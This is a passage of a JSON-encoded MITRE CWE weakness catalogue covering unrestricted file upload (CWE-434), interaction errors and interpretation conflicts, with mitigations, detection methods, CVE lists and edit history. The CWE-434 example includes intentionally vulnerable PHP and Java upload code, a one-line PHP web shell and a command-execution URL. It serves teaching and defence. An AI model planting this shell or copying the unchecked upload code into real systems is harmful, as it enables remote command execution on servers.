Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Observed_Examples"}]}},"434":{"attr":{"@_ID":"434","@_Name":"Unrestricted Upload of File with Dangerous Type","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product\'s environment.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"351","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"436","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"430","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"This can be primary when there is no check at all."},{"Ordinality":"Resultant","Description":"This is frequently resultant when use of double extensions (e.g. \\".php.gif\\") bypasses a sanity check."},{"Ordinality":"Resultant","Description":"This can be resultant from client-side enforcement (CWE-602); some products will include web script in web clients to check the filename, without verifying on the server side."}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Sometimes"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Unrestricted File Upload","Description":"The \\"unrestricted file upload\\" term is used in vulnerability databases and elsewhere, but it is insufficiently precise. The phrase could be interpreted as the lack of restrictions on the size or number of uploaded files, which is a resource consumption issue."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Arbitrary code execution is possible if an uploaded file is interpreted and executed as code by the recipient. This is especially true for .asp and .php extensions uploaded to web servers because these file types are often treated as automatically executable, even when file system permissions do not specify execution. For example, in Unix environments, programs typically cannot run unless the execute bit is set, but PHP programs may be executed by the web server without directly invoking them on the operating system."}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Generate a new, unique filename for an uploaded file instead of using the user-supplied filename, so that no external input is used at all.[REF-422] [REF-423]"},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"Phase":"Architecture and Design","Description":"Consider storing the uploaded files outside of the web document root entirely. Then, use other mechanisms to deliver the files dynamically. [REF-423]"},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","For example, limiting filenames to alphanumeric characters can help to restrict the introduction of unintended file extensions."]}},{"Phase":"Architecture and Design","Description":"Define a very limited set of allowable extensions and only generate filenames that end in these extensions. Consider the possibility of XSS (CWE-79) before allowing .html or .htm file types."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Ensure that only one extension is used in the filename. Some web servers, including some versions of Apache, may process files based on inner extensions so that \\"filename.php.gif\\" is fed to the PHP interpreter.[REF-422] [REF-423]"},{"Phase":"Implementation","Description":"When running on a web server that supports case-insensitive filenames, perform case-insensitive evaluations of the extensions that are provided."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Implementation","Description":"Do not rely exclusively on sanity checks of file contents to ensure that the file is of the expected type and size. It may be possible for an attacker to hide code in some file segments that will still be executed by the server. For example, GIF images may contain a free-form comments field."},{"Phase":"Implementation","Description":"Do not rely exclusively on the MIME content type or filename attribute when determining how to render a file. Validating the MIME content type and ensuring that it matches the extension is only a partial solution."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code intends to allow a user to upload a picture to the web server. The HTML code that drives the form on the user end has an input field of type \\"file\\".","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"<form action=\\"upload_picture.php\\" method=\\"post\\" enctype=\\"multipart/form-data\\">Choose a file to upload:<input type=\\"file\\" name=\\"filename\\"/><br/><input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/></form>","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$target = \\"pictures/\\" . basename($_FILES[\'uploadedfile\'][\'name\']);if(move_uploaded_file($_FILES[\'uploadedfile\'][\'tmp_name\'], $target)){}else{}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// Define the target location where the picture being","// uploaded is going to be saved.","// Move the uploaded file to the new location."],"xhtml:div":[{"#text":"echo \\"The picture has been successfully uploaded.\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \\"There was an error uploading the picture, please try again.\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"malicious.php"},{"attr":{"@_Nature":"attack","@_Language":"PHP"},"xhtml:div":{"#text":"<?php?>","xhtml:div":{"#text":"system($_GET[\'cmd\']);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://server.example.com/upload_dir/malicious.php?cmd=ls%20-l"}],"Body_Text":["Once submitted, the form above sends the file to upload_picture.php on the web server. PHP stores the file in a temporary location until it is retrieved (or discarded) by the server side code. In this example, the file is moved to a more permanent pictures/ directory.","The problem with the above code is that there is no check regarding type of file being uploaded. Assuming that pictures/ is available in the web document root, an attacker could upload a file with the name:","Since this filename ends in \\".php\\" it can be executed by the web server. In the contents of this uploaded file, the attacker could use:","Once this file has been installed, the attacker can enter arbitrary commands to execute using a URL such as:","which runs the \\"ls -l\\" command - or any other type of command that the attacker wants to specify."]},{"attr":{"@_Demonstrative_Example_ID":"DX-22"},"Intro_Text":"The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"<form action=\\"FileUploadServlet\\" method=\\"post\\" enctype=\\"multipart/form-data\\">Choose a file to upload:<input type=\\"file\\" name=\\"filename\\"/><br/><input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/></form>","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class FileUploadServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"response.setContentType(\\"text/html\\");PrintWriter out = response.getWriter();String contentType = request.getContentType();// the starting position of the boundary headerint ind = contentType.indexOf(\\"boundary=\\");String boundary = contentType.substring(ind+9);String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value// verify that content type is multipart form dataif (contentType != null && contentType.indexOf(\\"multipart/form-data\\") != -1) {}// output unsuccessful upload response HTML pageelse{...}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf(\\"\\\\\\\\\\"), pLine.lastIndexOf(\\"\\\\\\"\\"));...// output the file to the local upload directorytry {} catch (IOException ex) {...}// output successful upload response HTML page","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {} //end of for loopbw.close();","xhtml:br":["",""],"xhtml:div":{"#text":"if (line.indexOf(boundary) == -1) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bw.write(line);bw.newLine();bw.flush();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}}}}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":["When submitted the Java servlet\'s doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory.","This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code.","Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use \\"../\\" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0901","Description":"Web-based mail product stores \\".shtml\\" attachments that could contain SSI","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0901"},{"Reference":"CVE-2002-1841","Description":"PHP upload does not restrict file types","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1841"},{"Reference":"CVE-2005-1868","Description":"upload and execution of .php file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1868"},{"Reference":"CVE-2005-1881","Description":"upload file with dangerous extension","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1881"},{"Reference":"CVE-2005-0254","Description":"program does not restrict file types","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0254"},{"Reference":"CVE-2004-2262","Description":"improper type checking of uploaded files","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2262"},{"Reference":"CVE-2006-4558","Description":"Double \\"php\\" extension leaves an active php extension in the generated filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4558"},{"Reference":"CVE-2006-6994","Description":"ASP program allows upload of .asp files by bypassing client-side checks","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6994"},{"Reference":"CVE-2005-3288","Description":"ASP file upload","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3288"},{"Reference":"CVE-2006-2428","Description":"ASP file upload","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2428"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unrestricted File Upload"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-434"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-422"}},{"attr":{"@_External_Reference_ID":"REF-423"}},{"attr":{"@_External_Reference_ID":"REF-424"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, "File Uploading", Page 1068"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-434"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":["This can have a chaining relationship with incomplete denylist / permissive allowlist errors when the product tries, but fails, to properly limit which types of files are allowed (CWE-183, CWE-184).","This can also overlap multiple interpretation errors for intermediaries, e.g. anti-virus products that do not remove or quarantine attachments with certain file extensions that can be processed by client systems."]},{"#text":"PHP applications are most targeted, but this likely applies to other languages that support file upload, as well as non-web technologies. ASP applications have also demonstrated this problem.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Importance":"Critical","Modification_Comment":"converted from Compound_Element to Weakness"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Name, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated References, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Unrestricted File Upload","attr":{"@_Date":"2010-02-16"}}}},"435":{"attr":{"@_ID":"435","@_Name":"Improper Interaction Between Multiple Correctly-Behaving Entities","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"An interaction error occurs when two entities have correct behavior when running independently of each other, but when they are integrated as components in a larger system or process, they introduce incorrect behaviors that may cause resultant weaknesses.","Extended_Description":"When a system or process combines multiple independent components, this often produces new, emergent behaviors at the system level. However, if the interactions between these components are not fully accounted for, some of the emergent behaviors can be incorrect or even insecure.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Interaction Error"},{"Term":"Emergent Fault"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Unexpected State","Varies by Context"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Interaction Errors"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-568"}}},"Notes":{"Note":{"#text":"The \\"Interaction Error\\" term, in CWE and elsewhere, is only intended to describe products that behave according to specification. When one or more of the products do not comply with specifications, then it is more likely to be API Abuse (CWE-227) or an interpretation conflict (CWE-436). This distinction can be blurred in real world scenarios, especially when \\"de facto\\" standards do not comply with specifications, or when there are no standards but there is widespread adoption. As a result, it can be difficult to distinguish these weaknesses during mapping and classification.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Alternate_Terms, Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Type"}],"Previous_Entry_Name":[{"#text":"Interaction Errors","attr":{"@_Date":"2008-04-11"}},{"#text":"Interaction Error","attr":{"@_Date":"2017-11-08"}},{"#text":"Improper Interaction Between Multiple Entities","attr":{"@_Date":"2018-03-27"}}]}},"436":{"attr":{"@_ID":"436","@_Name":"Interpretation Conflict","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B\'s state.","Extended_Description":"This is generally found in proxies, firewalls, anti-virus software, and other intermediary devices that monitor, allow, deny, or modify traffic based on how the client or server is expected to behave.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Varies by Context"]}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The paper \\"Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection\\" [REF-428] shows that OSes varied widely in how they manage unusual packets, which made it difficult or impossible for intrusion detection systems to properly detect certain attacker manipulations that took advantage of these OS differences."},{"Intro_Text":"Null characters have different interpretations in Perl and C, which have security consequences when Perl invokes C functions. Similar problems have been reported in ASP [REF-429] and PHP."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1215","Description":"Bypass filters or poison web cache using requests with multiple Content-Length headers, a non-standard behavior.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1215"},{"Reference":"CVE-2002-0485","Description":"Anti-virus product allows bypass via Content-Type and Content-Disposition headers that are mixed case, which are still processed by some clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0485"},{"Reference":"CVE-2002-1978","Description":"FTP clients sending a command with \\"PASV\\" in the argument can cause firewalls to misinterpret the server\'s error as a valid response, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1978"},{"Reference":"CVE-2002-1979","Description":"FTP clients sending a command with \\"PASV\\" in the argument can cause firewalls to misinterpret the server\'s error as a valid response, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1979"},{"Reference":"CVE-2002-0637","Description":"Virus product bypass with spaces between MIME header fields and the \\":\\" separator, a non-standard message that is accepted by some clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0637"},{"Reference":"CVE-2002-1777","Description":"AV product detection bypass using inconsistency manipulation (file extension in MIME Content-Type vs. Content-Disposition field).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1777"},{"Reference":"CVE-2005-3310","Description":"CMS system allows uploads of files with GIF/JPG extensions, but if they contain HTML, Internet Explorer renders them as HTML instead of images.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3310"},{"Reference":"CVE-2005-4260","Description":"Interpretation conflict allows XSS via invalid \\"<\\" when a \\">\\" is expected, which is treated as \\">\\" by many web browsers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4260"},{"Reference":"CVE-2005-4080","Description":"Interpretation conflict (non-standard behavior) enables XSS because browser ignores invalid characters in the middle of tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4080"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Interpretation Error (MIE)"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":27,"Entry_Name":"HTTP Response Smuggling"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"273"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-427"}},{"attr":{"@_External_Reference_ID":"REF-428"}},{"attr":{"@_External_Reference_ID":"REF-429"}},{"attr":{"@_External_Reference_ID":"REF-430"}},{"attr":{"@_External_Reference_ID":"REF-431"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content 